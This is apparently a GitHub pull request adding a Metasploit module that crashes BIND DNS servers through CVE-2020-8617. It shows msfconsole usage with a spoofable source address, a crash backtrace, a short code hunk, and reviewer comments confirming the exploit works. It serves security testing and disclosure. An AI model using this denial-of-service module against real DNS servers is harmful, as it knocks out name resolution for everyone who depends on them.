### PR TITLE
Adding DoS exploit for BIND [CVE-2020-8617]

### PR DESCRIPTION
**Pull request by shutingrz**
Add a module that demonstrates a denial of service on BIND.
## Verification
- [x] Start `msfconsole`
- [x] `use auxiliary/dos/dns/bind_tsig_badtime`
- [x] Run
- [x] **Verify** The server should crash
- [x] **Document** the thing and how it work

### msfconole
```
msf5 > use auxiliary/dos/dns/bind_tsig_badtime
msf5 auxiliary(dos/dns/bind_tsig_badtime) > show options

Module options (auxiliary/dos/dns/bind_tsig_badtime):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      53               yes       The target port (UDP)
   SRC_ADDR                    no        Source address to spoof
   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(dos/dns/bind_tsig_badtime) > set RHOSTS 192.168.2.26
RHOSTS => 192.168.2.26
msf5 auxiliary(dos/dns/bind_tsig_badtime) > show options

Module options (auxiliary/dos/dns/bind_tsig_badtime):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   INTERFACE                   no        The name of the interface
   RHOSTS     192.168.2.26     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      53               yes       The target port (UDP)
   SRC_ADDR                    no        Source address to spoof
   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(dos/dns/bind_tsig_badtime) > run

[*] Sending packet to 192.168.2.26
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

### Server output from crash
```
26-May-2020 02:45:59.565 general: critical: tsig.c:954: INSIST(msg->verified_sig) failed, back trace
26-May-2020 02:45:59.565 general: critical: #0 0x563435d6aa40 in __do_global_dtors_aux_fini_array_entry()+0x5634357f6888
26-May-2020 02:45:59.565 general: critical: #1 0x563435f49c0a in __do_global_dtors_aux_fini_array_entry()+0x5634359d5a52
26-May-2020 02:45:59.565 general: critical: #2 0x563435ecfcb9 in __do_global_dtors_aux_fini_array_entry()+0x56343595bb01
26-May-2020 02:45:59.565 general: critical: #3 0x563435e14b19 in __do_global_dtors_aux_fini_array_entry()+0x5634358a0961
26-May-2020 02:45:59.565 general: critical: #4 0x563435d5b57f in __do_global_dtors_aux_fini_array_entry()+0x5634357e73c7
26-May-2020 02:45:59.565 general: critical: #5 0x563435d5cffd in __do_global_dtors_aux_fini_array_entry()+0x5634357e8e45
26-May-2020 02:45:59.565 general: critical: #6 0x563435d5d6a8 in __do_global_dtors_aux_fini_array_entry()+0x5634357e94f0
26-May-2020 02:45:59.565 general: critical: #7 0x563435d5f1a7 in __do_global_dtors_aux_fini_array_entry()+0x5634357eafef
26-May-2020 02:45:59.565 general: critical: #8 0x563435f716d9 in __do_global_dtors_aux_fini_array_entry()+0x5634359fd521
26-May-2020 02:45:59.565 general: critical: #9 0x7f6513f576db in __do_global_dtors_aux_fini_array_entry()+0x7f65139e3523
26-May-2020 02:45:59.565 general: critical: #10 0x7f6513c8088f in __do_global_dtors_aux_fini_array_entry()+0x7f651370c6d7
26-May-2020 02:45:59.565 general: critical: exiting (due to assertion failure)
```

### CODE REVIEW

File: modules/auxiliary/dos/dns/bind_tsig_badtime.rb [hunk 1]
```diff
@@ -0,0 +1,90 @@
...
+        ['URL', 'https://gitlab.isc.org/isc-projects/bind9/-/issues/1703']
+      ],
+      'DisclosureDate' => 'May 19 2020',
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' => {'ScannerRecvWindow' => 0}
+    ))
+
+    register_options([
+      Opt::RPORT(53),
+      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']),
```
Comment (wvu-r7) [inline modules/auxiliary/dos/dns/bind_tsig_badtime.rb:33]: This module looks familiar. :-)

```
wvu@kharak-STABLE:/rapid7/metasploit-framework:master$ git grep "Source address to spoof"
modules/auxiliary/dos/dns/bind_tkey.rb:      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
modules/auxiliary/dos/dns/bind_tsig.rb:      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
wvu@kharak-STABLE:/rapid7/metasploit-framework:master$
```

**Comment by smcintyre-r7** [comment]
I closed this by mistake while testing and merging it. I'm sorry about that.

**Comment by smcintyre-r7** [comment]
Alright since I messed up the changes I was hoping to have CI run on, I went ahead and landed this. The test was successful, I used [this docker image](https://hub.docker.com/r/sameersbn/bind/) and the exploit worked as intended. I made some minor changes to the docs in 6218817034a3ecdb795a7dc57987fb8c6cb24a81 and then landed this.

While GitHub shows this PR as closed due to my mistake, rest assured that your changes have been added to Metasploit. Thanks for this contribution @shutingrz!

**Comment by smcintyre-r7** [comment]
# Release Notes
This adds a DoS module targeting BIND DNS servers that leverages a code path which triggers an assertion that causes the server process to exit. This vulnerability is identified as CVE-2020-8617.

**Pull request closed without merging**